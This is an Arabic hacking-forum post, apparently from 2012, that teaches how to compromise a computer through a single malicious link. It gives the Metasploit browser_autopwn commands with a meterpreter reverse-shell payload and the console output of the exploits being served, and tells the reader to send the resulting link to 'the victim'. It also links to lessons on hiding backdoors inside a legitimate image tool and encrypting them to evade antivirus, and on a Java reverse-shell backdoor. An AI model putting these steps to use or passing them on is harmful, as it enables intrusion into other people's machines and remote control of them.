عرض مشاركة واحدة
قديم منذ /12-03-2012, 12:29 AM   #1
Admin
الأدارة العامة

الصورة الرمزية Admin

Admin غير متواجد حالياً

 رقم العضوية : 1
 تاريخ التسجيل : Oct 2012
 الجنس : ~ ذكر
 المشاركات : 1,223
 النقاط : 58
 قوة التقييم : Admin will become famous soon enough

شكراً: 17
تم شكره 23 مرة في 23 مشاركة
افتراضي رد: ماهي الخطوات التي اقوم بها من اجل وصول التبليغ في اختراق خارج شبكة-وماهي التغرة التي استعملها من


1- و ماهي التغرة التي استعملها من اجل اختراق عن طريق رابط فقط


إستخدم autopwn brawser
شرحتها هنا

(brwser_autopwn)(عمل باكدور ببايلودmterpreter و دمجه و تشفيره لتخطي الحمايات)(عمل باكدور ببالودjava)

السلام عليكم و رحمة الله و بركاته
أرجو ان تكونو بتمام العافية
اليوم درسنا سهل بس لا زم الإنتباه و رائع
سنتطرق في هذا الدرس إلي كيفية عمل autopwn لثغرات المتصفح brewser
تقلو او لا ما معني autopwn أقلكم هي أدات قوية موجوة في الميتا تستخدم للإختراق الأوتو ماتيكي

لماذ تستخدم الأدات : ستتخدم للإختراق و هي تجرب جميع الثغرات المتاحة و تخترق الجهاز و نسبة حدوث الإختراق (داخلي أو خارجي ) هي 90 %
و انا شارحها بالتفصيل في الدرس إلي فات من الدورة تبعي
و الأن التساءل حول لماذا نقوم بعمل الإختراق الأوتوماتيكي لثغرات النتصفح اقلكم أنا
نقوم بذالك من اجل تحربة جميع ثغرات المتصفح في رابط واحد فقط و ب*الك نزيد من نسبةالإختراق 50%
مثال :
=====
إنت تريد إختراق واحد عبر ثغرة المتصفح
بس إنت مو عارف شو المتصفح إلي يستخدمو mozila .chorme .... و مش عارف الإصدار إلي تستخدمو الضحية
فلو إنت غستخدمت ثغرة موزيلا فارفوكس و الضحية يستخدم الإكسبلور راح يفشل الإختراق
و حتي إذا إستخدمت إنت ثغرةإكسبلور بس إصدار لتعمل عليه الثغرة مو نفس إصدار الضحية فراح يفشل إختراقك
ل*الك نلجأ إلي إستخدام autopwn brewsers فهي تجرب جميع الثغرات
و الرابط إلي راح تعطيه للضحية راح يكون محنك من جميع الثغرات
يعني ماراح تقلق من نوع أو إصدار متصفح الضخية
تقول كيف
أنا ساشرح
نبدء
====
نفتح تارمنل
نفتح الكونسول
عن طريق الأمر msfconsole

نتظر
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 719x558.
بعدين نكتب الأمر
search autopwn
نختار الأولي auxiliary/server/browser_autopwn
وذالك بستخدام الأمر use ثم إختيارنا
و يصر الأمر كتالي
use auxiliary/server/browser_autopwn
ثم نخار الباليود المستخدم أنا راح اختار باليود المتر برتر فهو الأحسن و ساشرحه في دروس قادمة
set payload windows/meterpreter/reverse_tcp
الأن نتكتب الأمر show options لمعرفة متطلبات الثغرة
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 743x600.
نعبي اﻷهم فقط

الأن نكتب الإبي تبعنا

و ملاحظة :
=========
إذا كان الإختراق داخلي نكتب الإبي الداخلي نعرفه عن طريق الأمر ifconfig
إذا كان الإختراق خارجي نكتب الإبي الخارحي أو ال no-ip تبعك أحسن بكثير
نكتبه
set lhost 192.168.117.129
ثم البورت المستخدم و هو لازم يكون مفتوح في الروتر و في جدار الحماية
و هو مستخدم تلقائيا البورت 8080 و ممكن نغيرو بس إحنا نخله كما هو
ثم نعبي الخيار الأخير وهو ال URIPATH
نكتب / set URIPATH
ثم الأمر الاخير run أو exploit حسب ما تحب

تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 683x461.

ننتظر.........
راح في اﻷخيريعطيك رابط و هو الرابط إلي تبعثو للضحية
أنا النتيجة إلي ظهرت لي في الخير
msf auxiliary(browser_autopwn) > run[*] Auxiliary module running as background job
msf auxiliary(browser_autopwn) >[*] Starting exploit modules on host 192.168.117.129...[*] ---
...snip...[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/****************l_reverse_tcp[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/zCtg7oC[*] Local IP: http://192.168.117.129:8080/zCtg7oC[*] Server started.[*] Starting exploit multi/browser/mozilla_compareto with payload generic/****************l_reverse_tcp[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/vTNGJx[*] Local IP: http://192.168.117.129:8080/vTNGJx[*] Server started.[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/****************l_reverse_tcp[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/abmR33jxStsF7[*] Local IP: http://192.168.117.129:8080/abmR33jxStsF7[*] Server started.[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/****************l_reverse_tcp[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler
...snip...[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/RdDDhKANpV[*] Local IP: http://192.168.117.129:8080/RdDDhKANpV[*] Server started.[*] --- Done, found 12 exploit modules[*] Using URL: http://0.0.0.0:8080/[*] Local IP: http://192.168.117.129:8080/[*] Server started.
هذا الرابط إلي نبعثو للضحية
http://192.168.117.129:8080/

و إختراق موفق

هذه الدورة مقدمة من قبل somari

و من لم تظهر معه الصور
رابط تحميلها
http://www.mediafire.com/?xgbon6v0ch1dbc9



الدرس الثاني و سيكون شرحا لكيفية عمل باك دور و دمجه مع برنامج و تشفيره و تخطي حماية avg المشهورة
و أنا شارح فيه أيضا باليود meterpreter و ساشرح نو عين أخرين من الباليودات في الدروس القادمة
أتركمكم مع الشرح <HD>
رابط تحميله
http://www.mediafire.com/?6oxpo4eh5p7k347
ملاحظة في الدرس2 لقد تم دمج الباك دور مع برنامج تصغير الصورPIXresizer
الدرس3 :
و هو حول كيفية إنشاء باكدور java كلين غير مشكوف من اي حماية
إلي راح يكون يصيغة jar.
و هاذا الباك دور متميز بتخطيه للحمايات كلها
حتي بدون تشفير و هو من ًيستخدم لإنشاءه باليود <<و انا شارحو في الدرس>>
java/meterpreter/reverse_tcp
و هو من أقوي البالودات الموجودة علي الساحة
و هو يخلق إتصال عكسي و أنا أنصح يه لتخطي الجدران النارية و الأونتي فايروس إذا كانت الضحية تستخدمهم
رابط نتائج الفحص مع العلم بدون تشفير <<مذهل>>
http://www.virustotal.com/file-scan/...672-1325275849
أترككم مع الدرس<<HD>>
رابط التحميل
http://www.mediafire.com/?va72bqvq2qgax68






 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47